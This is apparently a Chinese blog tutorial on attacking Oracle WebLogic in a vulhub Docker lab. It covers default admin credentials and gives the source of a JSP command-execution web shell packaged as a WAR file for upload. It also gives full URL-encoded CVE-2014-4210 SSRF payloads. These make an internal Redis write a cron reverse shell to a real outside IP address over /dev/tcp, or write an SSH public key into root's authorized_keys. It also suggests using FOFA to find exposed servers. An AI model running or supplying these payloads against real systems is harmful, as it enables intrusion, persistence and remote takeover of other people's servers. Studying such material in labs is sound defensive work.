目录

一,Weblogic简介

二,Weblogic漏洞环境搭建

三,Weblogic弱口令

四,CVE-2014-4210

漏洞环境

漏洞危害

漏洞复现

进行内网存活探测


一,Weblogic简介

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic是美商Oracle的主要产品之一,是并购BEA得来。是商业市场上主要的Java(J2EE)应用服务器软件(application server)之一,是世界上第一个成功商业化的J2EE应用服务器, 已推出到12c(12.2.1.4) 版。而此产品也延伸出WebLogic Portal,WebLogic Integration等企业用的中间件(但当下Oracle主要以Fusion Middleware融合中间件来取代这些WebLogic Server之外的企业包),以及OEPE(Oracle Enterprise Pack for Eclipse)开发工具。

二,Weblogic漏洞环境搭建

docker pull vulhub/weblogic:10.3.6.0-2017

docker run -dit -p 7001:7001 vulhub/weblogic:10.3.6.0-2017

访问:http://kali IP://7001/console

三,Weblogic弱口令

Weblogic 存在默认口令漏洞:
可通过https://cirt.net/passwords?criteria=weblogic 网站进行查询Weblogic弱口令最终可以得到管理员密码。
账号:weblogic
密码:Oracle@123

有了管理员账户我们就要想办法上传一个war包,下面是一个jsp格式(主要此jsp不可用蚁剑连接,可以自己用蚁剑生成一个war包,然后安装下列步骤上传)

<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s +"\r\n"; } }
catch(IOException e) { e.printStackTrace(); } }
out.println(output);%>

对jsp进行war包打包

jar -cvf cmd.war cmd.jsp

 下面开始教大家在哪上传war包,如图所示

点击浏览上传war包,点击下一步

如同就是war包的路径

访问如下路径可以获得getshell

http://kali IP://7001/cmd/cmd.jsp?cmd=ls

查看cmd就可以看到文件路径

四,CVE-2014-4210

漏洞环境

FOFA搜app="Weblogic_interface_7001"

漏洞危害

Weblogic 漏洞生于 /uddiexplorer/SearchPublicRegistries.jsp 页面中,可以导致
SSRF ,用来攻击内网中一些 redis 和 fastcgi 之类的脆弱组件

漏洞复现

http://your-IP:7001/uddiexplorer/SearchPublicRegistries.jsp

进行内网存活探测

http://your-IP:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name

使用max hackber,发送post请求

&txtSearchname=sdf
&txtSearchkey=
&txtSearchfor=
&selfor=Business+location
&btnSubmit=Search
&operator=http://your-IP:9090

当 http 端口存活的时候就会显示 404 not found

尝试一个不存活的主机就是 No route to host

探测6379端口

 SSRF攻击内网Redis

写定时任务

/uddiexplorer/SearchPublicRegistries.jsp?
operator=http://172.18.0.1:6379/test%0D%0A%0D%0Aset%20x%20%22%5Cn%5Cn%5Cn%5Cn*%2F1%20*%20*%20*%20*%20%2Fbin%2Fbash%20-i%20>%26%20%2Fdev%2Ftcp%2F47.101.214.85%2F1234%200>%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fvar%2Fspool%2Fcron%2Fcrontabs%2F%0D%0Aconfig%20set%20dbfilename%20root%0D%0Asave%0D%0A%0D%0Aaaa&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

写SSH公钥

/uddiexplorer/SearchPublicRegistries.jsp?
operator=http://172.18.0.1:6379/test%0D%0A%0D%0Aset%20xx%20%22%5Cn%5Cn%5Cn%5Cnsshrsa%20AAAAB3NzaC1yc2EAAAADAQABAAABAQDV14i/SITCBQjzb%2B8xL0vwGwKjnMEQiarTxdVokFToK0Xw99m0eJwKV3WcTQgSykHA2rFxbQw%2Fv9IVx89bAzX0iOBAU8jF%2B9oH5KE9KBzM%2FT1Vr3DDwmNny2qYCfizO9jJ90fr3DUeXWwl%2BD24XiKfkDzlDly9LgEYxXl%2FCIgZ91QcTA0UeSBLXCgigVLKhDNZGGBqMFrGNUsj0esNJr7pJsYEnIn%2BN5BtnUWEce1KERlGDiwvzRpyFvOKgQpEAiS%2BR781GSsAsJsCQz8OFge6lx0iSMNZ6TWjkQYKlnTkQvzOo%2FZhINtItYziRXJKmNQLdPpQ7OYo2WOQ4TIDFtR5%20root@iZuf6jc5pa52ijq06q5f1lZ%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Froot%2F.ssh%0D%0Aconfig%20set%20dbfilename%20authorized_keys%0D%0Asave%0D%0A%0D%0Aaaa&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business%2Blocation&btnSubmit=Search

漏洞复现 - - - Weblogic漏洞(一)相关推荐

  1. cms漏洞复现-越权漏洞

    cms漏洞复现-越权漏洞 注册一个用户001,并登录上去,打开bp抓包,点击会员空间 关注到如下cookie中两个值,将dedeuserid--ckmd5的值用last_vid_ckmd5的值来进行替 ...

  2. 漏洞复现—Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password

    Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password 基础知识 漏洞原理 涉及版本 ...

  3. [漏洞复现]CVE-2021-26855 漏洞复现及Exchange邮箱详细安装过程

    CVE-2021-26855 漏洞复现及Exchange邮箱详细安装过程 一.介绍 Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统.2021年03月3日,微软官方 ...

  4. 漏洞复现-webmin漏洞系列分析与利用

    webmin漏洞系列分析与利用 Webmin 远程代码执行CVE-2022-0824 编号CVE编号:CVE-2022-0824 影响版本 漏洞简介 复现 拉取漏洞镜像 启动漏洞环境 解决方案 POC ...

  5. java 漏洞复现_CVE-2019-12384漏洞分析及复现

    原标题:CVE-2019-12384漏洞分析及复现 *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 引言 近期关于Jackson的 ...

  6. Weblogic历史漏洞复现

    Weblogic WebLogic是美国Oracle公司出品的一个applicationserver,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发.集成.部署和管理大型分布式 ...

  7. weblogic漏洞复现

    weblogic 漏洞复现 Weblogic ssrf https://www.hetianlab.com/expc.do?ec=ECID9d6c0ca797abec20170210143122000 ...

  8. [Vulhub] Weblogic 漏洞复现

    文章目录 Weblogic 常规渗透测试环境 0x00 测试环境 0x01 弱口令 0x02 任意文件读取漏洞的利用 0x03 后台上传webshell Weblogic WLS Core Compo ...

  9. Weblogic漏洞利用总结

    所有文章,仅供安全研究与学习之用,后果自负! weblogic 一.weblogic 反序列化(CVE-2020-2883) 0x01 漏洞描述 0x02 影响范围 0x03 漏洞利用 0x04 漏洞 ...

最新文章

  1. Linux LVM 的使用详解
  2. VTK:饼形图用法实战
  3. 【Mybatis】sqlSessionTemplate.getConnection() 遇到 java.sql.SQLException: Connection is closed
  4. c++ 数组 结构体
  5. .net3.5下的Socket通信框架
  6. Ubuntu中虚拟环境的搭建
  7. 基于FPGA实现DAC8811接口(正弦波)
  8. 一次有趣的面试经历,当前端面试碰到后端面试官会发生什么?
  9. 2021特斯拉Model3/ModelY维修手册电路图接线图用户手册资料含国产进口车型
  10. Qualcomm Ramdump debugging
  11. 计算机硬盘找不到,电脑找不到硬盘怎么办
  12. 论文阅读:Social Media and Fake News in the 2016 Election
  13. 2020-08-26 笔记的风格和措辞
  14. 情人节程序员用HTML网页表白【3D旋转木马相册】 HTML5七夕情人节表白网页源码 HTML+CSS+JavaScript
  15. 11-20什么是内网,外网,局域网,如何判断
  16. HDU 5643 King's Game 打表
  17. CSS字体、行高等其他样式
  18. LeetCode:1219.黄金矿工(Java语言)
  19. MA35D1记录1-源码编译
  20. python将html转换为pdf,如何使用Python将HTML转换为PDF

热门文章

  1. Java流利说断点续传,OkDownload源码分析
  2. 好消息|深圳市16条在建地铁,有3条将通车
  3. 移动应用开发的生态系统:了解如何构建一个健康和繁荣的移动应用开发生态系统
  4. ES6日期函数整理(常用)
  5. 密码学大作业总结博客
  6. Angular微前端
  7. 【Java基础法语】前言、JDK安装、入门程序、常量、变量
  8. C# 图书管理系统(MySQL)——属性设计(三)
  9. vue 3.0使用离线百度地图
  10. MT6580芯片介绍MT6580原理图资料